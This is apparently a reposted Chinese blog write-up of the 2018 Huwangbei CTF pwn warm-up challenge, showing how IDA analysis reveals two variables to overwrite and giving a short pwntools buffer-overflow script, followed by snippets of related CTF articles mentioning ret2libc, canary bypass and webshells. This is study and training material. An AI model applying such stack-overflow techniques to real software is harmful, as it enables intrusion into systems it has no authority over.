2018护网杯的pwn签到题(详细过程)

最新推荐文章于 2024-05-16 10:35:29 发布
最新推荐文章于 2024-05-16 10:35:29 发布
阅读量610 收藏
点赞数
原文链接:http://www.cnblogs.com/z3ro/p/9786742.html
版权

题目:

链接:https://pan.baidu.com/s/1WcO-y2MQ6Wb17PqL2dxyyA
提取码:z5a7

 

首先找保护机制

难受 保护全开!!

 

运行一下,发现只有一个输入点。

 

 

ida分析一波

发现只要满足 v7=0x7FFFFFFFFFFFFFFFLL 还有v8=0.1 但是在payload去传值需要用0x????,这里可以了解一下浮点型  0.1的值:

https://math.stackexchange.com/questions/1791562/converting-0-1-to-binary-64-bit-double?tdsourcetag=s_pctim_aiomsg 

 

或者用c跑一下

 

 

思路:填buf,直到覆盖v7和v8的值,达到成功修改。

 

from pwn import *


p = process('./pwn2')

payload = ''
payload += 'A'*24 + p64(0x7FFFFFFFFFFFFFFF) + p64(0x3FB999999999999A)

p.sendline(payload)
p.interactive()

 

比赛的时候脑子不是很好使,赛后不能再明明白白了。

 

转载于:https://www.cnblogs.com/z3ro/p/9786742.html

dengshanyi7201
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PWN测试
07-18
信息安全PWN测试目:用于CTF的练习与PWN的学习,测试目。
ctfshow 内部赛 pwn 签到
SCP000111的博客
11-16 1631
ctfshow 内部赛 pwn 签到 找了在刷的中,不会做这道,找了好久没找到wp,搞了几天,还怀疑目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。 先放图片,2021.11.16该代码可行 这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的目似乎与这道一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及get
ctfshow-WEB-web1签到_ctf web where is flag
最新发布
2401_84297899的博客
05-16 278
ctf.show WEB模块的第一关,这一关的flag藏在注释中,由于开发人员的粗心,没有及时删除开发过程中的代码注释,从而留下了敏感信息页面中只有一句 where is flag?,我们按F12(或者Fn+F12)进入开发者模式,查看页面的源码Ctrl+c将源码中的注释复制下来,很明显是加密后的内容,需要进行解密,从而获取flag复制注释符中间的内容,到解密还有兄弟不知道网络安全面试可以提前刷吗?费时一周整理的160+网络安全面试,金九银十,做网络安全面试里的显眼包!
ctfshow pwn——PWN签到pwn02
qq_55233040的博客
01-24 5026
PWNPWN签到pwn02 PWN签到 nc连上就行了 pwn02 check一下是32位,用32位ida打开看看 很直白的pwnme函数 9字节的空间读入了50字节,产生了栈溢出 用pwndbg调试一下 可以看到ebp前读取了9个字节,而32位程序的ebp占用4个字节,所以eip被覆盖成为ddde 回到ida,找到system函数 system函数在stack函数中,找到stack函数的位置: 写脚本 from pwn import * io = remote("pwn.challeng
强网 签到re 签到pwn
qq_41071646的博客
05-27 2003
强网给打自闭了 最后也是没有进到第一页 比较可惜 不过手速快 抢到了 先锋的三血 感觉还不错 不得不说强网的反作弊做的真心不错 re 都能每个人的flag 不一样 真心可以 然后强网的 pwn竟然还有用队伍 token来搞 真的秀 先说re 即可得出flag Just re 这个目也算是签到 首先要修复函数 虽然 上面xmmword_405018 变化...
阿里云2024 CTF pwn 签到
m0_74220442的博客
03-27 1175
定义了两个数组,通过给第二个数组赋值来绕过各种判断语句 到达漏洞函数,通过第一个漏洞函数泄露libc地址,通过第二个漏洞函数 进行栈溢出并且能够绕过canary 执行rop链。
2018护网逆向
10-16
2018护网逆向目是针对这一领域的专业挑战,旨在检验参赛者在逆向工程方面的技能和知识。这三道目——task_Loader7.exe、task_APM233_6.exe和task_huwang-refinal-6.exe,很可能是精心设计的恶意软件或复杂程序...
关于往年护网笔试库收集
04-11
### 关于往年护网笔试库收集的知识点详解 #### 1. 半开放式端口扫描类型 在网络安全领域,端口扫描是一种常见的技术手段,用于发现目标主机上开放的服务端口。目中的“半开放式”扫描指的是TCP SYN扫描。这种...
2020全国工业互联网安全技术技能大赛-护网及附件-chinaiisc2020
01-11
2020全国工业互联网安全技术技能大赛,原来的护网,比赛的原以及附件,供大家进行学习和交流。祝大家技术进步!
各大厂商护网面试汇总
06-26
"各大厂商护网面试汇总" 本资源汇总了各大厂商护网面试,涵盖了大量的IT知识点,包括go语言免杀shellcode、Windows Defender防御机制、卡巴斯基进程保护、Fastjson不出网、内存Webshell命令执行、域内渗透、...
2020全国工业互联网安全技术技能大赛-护网-chinaiisc2020.zip
10-24
2020全国工业互联网安全技术技能大赛,原来的护网,比赛的原以及附件,供大家进行学习和交流。祝大家技术进步!
CTF夺旗赛.pdf
11-16
CTF夺旗赛.pdf
护网pwn目gettingStart
keep coding
10-13 641
拖进IDA 通过main函数的代码显而易见 v7需要等于0x7FFFFFFFFFFFFFF以及v8需要等于0.1 通过buf进行覆盖即可 0.1在内存中的值为4591870180066957722 double a = 0.1; printf("%lld\n", *(long long*)&a); //输出4591870180066957722 编写脚本 from ...
[XYCTF新生赛]-PWN:hello_world(签到)解析(泄露libc_start_call_main获取libc地址)
2301_79326813的博客
04-04 241
查看保护查看ida这里的printf没有格式化字符串漏洞,但是我们依旧可以填充栈来利用printf泄露栈上信息根据我们能填充的字节数来看,我们无法泄露出libc_start_main+128的地址,但是可以泄露libc_start_call_main+128的地址,利用加上或减去相对libc_start_main的偏移依旧可以得出libc_start_main的地址,实现ret2libc。
一道签到
kflcg的博客
08-08 752
A: 一道签到 时间限制: 2 Sec  内存限制: 128 MB 提交: 68  解决: 32 [提交][状态][讨论版] 目描述 我想说这是一道签到,意思就是本次测试中最水的一道,不过我这样说你真的愿意相信我吗?哈哈,目是这样的给你一下小数,然后请告诉我分别告诉我这个小数的循环节的循环次数、循环节以及循环节长度 输入 输入包括多组测试数据每组测试数据1行
南邮CTF--------签到1
weixin_46204746的博客
02-10 2561
南邮CTF--------签到 1.签到(chinalover.sinaapp.com/web1/) 直接右键查看源码 flag is:nctf{flag_admiaanaaaaaaaaaaa} 2.签到2 (teamxlc.sinaapp.com/web1/02298884f0724c04293b4d8c0178615e/index.php) 打开页面,...
CTF | CTF比赛解分享
hackzkaq的博客
10-09 7327
前言:由于此次比赛的目较多,所以这是这个比赛的第一篇wp,共20,先记录一下,防止忘记。里面有些目是新手较为简单,但也有许多有意思的目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。
CTFweb篇——签到
热门推荐
suiyideAli的博客
09-21 1万+
0x00 前言 一个简单的CTF签到。 0x01.打开靶场 0x02 打开靶场地址发现信息,通过目提示信息使用burpsuit抓包 Send to Repeater 然后查看 Repeater 点击GO 在Response中 Headers 找到Flag ok完成。 ...
CTF签到
m0_67935111的博客
05-08 1733
提示输入口令zhimakaimen,但是查看源代码发现输入框对长度有限制,最长只能输入10位,使用firefox插件firebug,chrome控制台可直接对manlength值进行修改,改为大于11,即可输入;也可以使用burpsuite进行抓包,直接修改post值即可得到flag! flag is:nctf{follow_me_to_exploit} ...
[护网 2018]easy_tornado
03-16
护网 2018 中的 easy_tornado 目是一道Web安全目。根据目描述,该网站使用了 Tornado 框架搭建,并且存在一个可以进行任意代码执行的漏洞。需要我们利用这个漏洞,在服务器上执行指定的命令。 解决这道目...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值